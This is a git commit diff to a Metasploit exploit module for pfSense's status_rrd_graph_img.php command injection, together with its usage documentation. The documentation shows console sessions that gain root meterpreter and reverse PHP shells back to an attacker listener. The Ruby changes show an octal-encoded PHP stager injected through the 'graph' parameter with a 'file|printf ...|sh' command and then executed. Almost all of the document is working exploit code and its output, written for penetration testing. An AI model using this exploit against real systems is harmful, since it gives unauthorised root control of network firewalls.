
MS-2855/keylogger-mettle-extension
wetw0rk 2018-01-01 17:30:43 -06:00
parent bc088cb379
commit 8f0e41e159
2 changed files with 35 additions and 100 deletions


@ -27,44 +27,22 @@
### pfSense Community Edition 2.2.6-RELEASE
```
msf exploit(unix/http/pfsense_graph_injection_exec) > options
msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
Module options (exploit/unix/http/pfsense_graph_injection_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD pfsense yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.132 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming...
[*] Sending stage (37543 bytes) to 192.168.75.132
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600
[*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600
meterpreter > sysinfo
Computer : pfSense.localdomain
OS : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
Meterpreter : php/freebsd
meterpreter > getuid
Server username: root (0)
meterpreter >
@ -73,45 +51,20 @@ meterpreter >
### pfSense Community Edition 2.1.3-RELEASE
```
msf exploit(unix/http/pfsense_graph_injection_exec) > options
Module options (exploit/unix/http/pfsense_graph_injection_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD pfsense yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.131 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf > use exploit/unix/http/pfsense_graph_injection_exec
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming...
[*] Sending stage (37543 bytes) to 192.168.75.131
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.131:45257) at 2018-01-01 01:03:05 -0600
[*] Payload uploaded successfully, executing
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
uname -a
meterpreter > getuid
Server username: root (0)
meterpreter >
FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
```


@ -40,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
'Encoder' => 'php/base64',
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
},
'DisclosureDate' => 'Apr 18, 2016',
'Platform' => 'php',
'Arch' => ARCH_PHP,
@ -108,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
# If the device isn't fully setup, you get stuck at redirects to wizard.php
# however, this does NOT stop exploitation strangely
print_error("pfSense version not detected or wizard still enabled.")
print_error('pfSense version not detected or wizard still enabled.')
Gem::Version.new('0.0')
end
@ -116,10 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
begin
cookie = login
version = detect_version(cookie)
filename = rand_text_alpha(rand(20))
filename = rand_text_alpha(rand(10))
# generate the PHP meterpreter payload
stager = "echo \'<?php "
stager = 'echo \'<?php '
stager << payload.encode
stager << "?>\' > #(unknown)"
# here we begin the encoding process to
@ -127,25 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
# don't look
complete_stage = ""
for i in 0..(stager.length()-1)
if "#{version}" =~ /2.2/
complete_stage << "\\\\#{stager[i].ord.to_s(8)}"
else
complete_stage << "\\#{stager[i].ord.to_s(8)}"
if version.to_s =~ /2.2/
complete_stage << '\\'
end
complete_stage << "\\#{stager[i].ord.to_s(8)}"
end
res = send_request_cgi(
'uri' => '/status_rrd_graph_img.php',
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Origin' => 'null',
'Cookie' => cookie,
'Connection' => 'close',
},
'cookie' => cookie,
'vars_get' => {
'database' => '-throughput.rrd',
'graph' => "file|printf '#{complete_stage}'|sh|echo",
@ -153,23 +143,15 @@ class MetasploitModule < Msf::Exploit::Remote
)
if res && res.code == 200
print_status("Triggering the payload, root shell incoming...")
print_status('Payload uploaded successfully, executing')
else
print_error("Failed to upload the initial payload...")
print_error('Failed to upload payload...')
end
res = send_request_cgi({
'uri' => '/status_rrd_graph_img.php',
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => cookie,
'Connection' => 'close',
'Upgrade-Insecure-Requests' => '1',
},
'cookie' => cookie,
'vars_get' => {
'database' => '-throughput.rrd',
'graph' => "file|php #(unknown)|echo "